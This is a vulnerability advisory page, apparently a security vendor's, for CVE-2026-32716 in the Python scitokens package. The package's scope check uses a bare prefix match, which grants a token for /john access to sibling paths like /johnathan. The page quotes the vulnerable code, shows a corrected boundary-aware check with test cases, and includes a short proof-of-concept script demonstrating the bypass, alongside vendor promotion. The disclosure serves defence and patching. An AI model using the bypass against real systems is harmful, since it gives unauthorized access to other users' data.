CVE-2026-32716

CVE-2026-32716 is a high-severity security vulnerability in scitokens (pip), affecting versions < 1.9.6. It is fixed in 1.9.6.

Summary

The Enforcer incorrectly validates scope paths by using a simple prefix match (startswith). This allows a token with access to a specific path (e.g., /john) to also access sibling paths that start with the same prefix (e.g., /johnathan, /johnny), which is an Authorization Bypass.

Details

File: src/scitokens/scitokens.py
Methods: _validate_scp and _validate_scope

Vulnerable Code Snippets:

In _validate_scp (around line 696):

    for scope in value:
        authz, norm_path = self._check_scope(scope)
        if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):
            return True

In _validate_scope (around line 722):

    for scope in value.split(" "):
        authz, norm_path = self._check_scope(scope)
        if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):
            return True

If norm_path (authorized) is /john and norm_requested_path (requested) is /johnathan, startswith returns True, incorrectly granting access.
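The flaw and a boundary-aware check side by side, as an added example that is not scitokens' own code and not necessarily the exact change shipped in 1.9.6: `prefix_match_vulnerable` reproduces the plain `startswith` comparison quoted above, while `path_scope_match` (a hypothetical name) only accepts the authorized path itself or a descendant beneath a `/` separator. The normalization helper built on `posixpath.normpath` is an assumption standing in for the package's own `_check_scope` normalization, and the case table is constructed for this example.

```python
import posixpath

def normalize_path(path: str) -> str:
    """Collapse '.', '..' and repeated slashes and force a single leading '/'.
    (Assumed normalization; stands in for scitokens' own _check_scope logic.)"""
    return posixpath.normpath("/" + path.lstrip("/"))

def prefix_match_vulnerable(authorized: str, requested: str) -> bool:
    """The flawed check: a bare string prefix test, as in versions < 1.9.6.
    '/johnathan'.startswith('/john') is True, so sibling paths leak through."""
    return normalize_path(requested).startswith(normalize_path(authorized))

def path_scope_match(authorized: str, requested: str) -> bool:
    """Boundary-aware check: grant only the authorized path itself or a path
    under it, i.e. one that continues with a '/' after the authorized prefix."""
    auth = normalize_path(authorized)
    req = normalize_path(requested)
    if auth == "/":
        return True           # a root scope covers every path
    return req == auth or req.startswith(auth + "/")

# Constructed cases: (authorized scope path, requested path, access expected)
CASES = [
    ("/john", "/john", True),
    ("/john", "/john/file", True),
    ("/john", "/john/", True),               # trailing slash normalizes away
    ("/john/", "/john/file", True),          # trailing slash on the scope
    ("/john", "/johnathan", False),          # sibling sharing a prefix
    ("/john", "/johnny", False),             # sibling sharing a prefix
    ("/john", "/john/../johnathan", False),  # traversal back to a sibling
    ("/", "/anything/at/all", True),         # root scope
    ("/john", "/", False),                   # parent of the scope
]

def bypasses(check) -> list:
    """Return the (authorized, requested) pairs the given check wrongly grants."""
    return [(a, r) for a, r, expected in CASES if check(a, r) and not expected]

def all_correct(check) -> bool:
    """True when the check agrees with the expected decision on every case."""
    return all(check(a, r) == expected for a, r, expected in CASES)

if __name__ == "__main__":
    for name, check in (("prefix_match_vulnerable", prefix_match_vulnerable),
                        ("path_scope_match", path_scope_match)):
        print(f"{name}: correct on all cases = {all_correct(check)}")
        for a, r in bypasses(check):
            print(f"  bypass: scope {a!r} wrongly grants {r!r}")
```

The traversal case matters in either direction: normalization must run before the comparison so that `/john/../johnathan` is judged as `/johnathan`, and the boundary test must then run on the normalized form rather than on the raw request.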

PoC

    import sys

    # Make the checkout's src/ importable before the package itself is imported,
    # otherwise the path insertion has no effect on which scitokens gets loaded
    sys.path.insert(0, "src")

    import scitokens

    def poc_scope_bypass():
        """
        Demonstrate an Authorization Bypass vulnerability in scope path checking.
        """
        print("--- PoC: Incorrect Scope Path Checking (Authorization Bypass) ---")

        issuer = "https://scitokens.org/unittest"
        enforcer = scitokens.Enforcer(issuer)

        # Create a token with access to /john
        token = scitokens.SciToken()
        token['iss'] = issuer
        token['scope'] = "read:/john"

        print("Authorized path in scope: /john")

        # 1. Test access to /john/file (should be allowed)
        print("[1] Testing legitimate subpath: /john/file")
        if enforcer.test(token, 'read', '/john/file'):
            print("    -> Access GRANTED (Correct behavior)")
        else:
            print("    -> Access DENIED (Incorrect behavior - should have access to subpaths)")

        # 2. Test access to /johnathan (SHOULD BE DENIED)
        print("[2] Testing illegitimate sibling path: /johnathan")
        if enforcer.test(token, 'read', '/johnathan'):
            print("    -> [VULNERABILITY] Access GRANTED! This is an authorization bypass.")
        else:
            print("    -> Access DENIED (Correct behavior - fix is working)")

        # 3. Test access to /johnny (SHOULD BE DENIED)
        print("[3] Testing illegitimate sibling path: /johnny")
        if enforcer.test(token, 'read', '/johnny'):
            print("    -> [VULNERABILITY] Access GRANTED! This is an authorization bypass.")
        else:
            print("    -> Access DENIED (Correct behavior - fix is working)")

    if __name__ == "__main__":
        poc_scope_bypass()

Impact

This bug allows a user to access resources they are not authorized for. For example, if a system uses usernames as top-level directories in a shared storage, a user john might be able to read or write to the directory of user johnathan simply because their names share a prefix.

CVE-2026-32716 has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.9.6); upgrading removes the vulnerable code path.

Affected versions

scitokens (< 1.9.6)

Security releases

scitokens → 1.9.6 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Remediation advice

Upgrade scitokens to 1.9.6 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-32716? CVE-2026-32716 is a high-severity security vulnerability in scitokens (pip), affecting versions < 1.9.6. It is fixed in 1.9.6.
  2. How severe is CVE-2026-32716? CVE-2026-32716 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of scitokens are affected by CVE-2026-32716? scitokens (pip) versions < 1.9.6 are affected.
  4. Is there a fix for CVE-2026-32716? Yes. CVE-2026-32716 is fixed in 1.9.6. Upgrade to this version or later.
  5. Is CVE-2026-32716 exploitable, and should I be worried? Whether CVE-2026-32716 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-32716 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-32716? Upgrade scitokens to 1.9.6 or later.

Other vulnerabilities in scitokens

CVE-2026-32727
CVE-2026-32716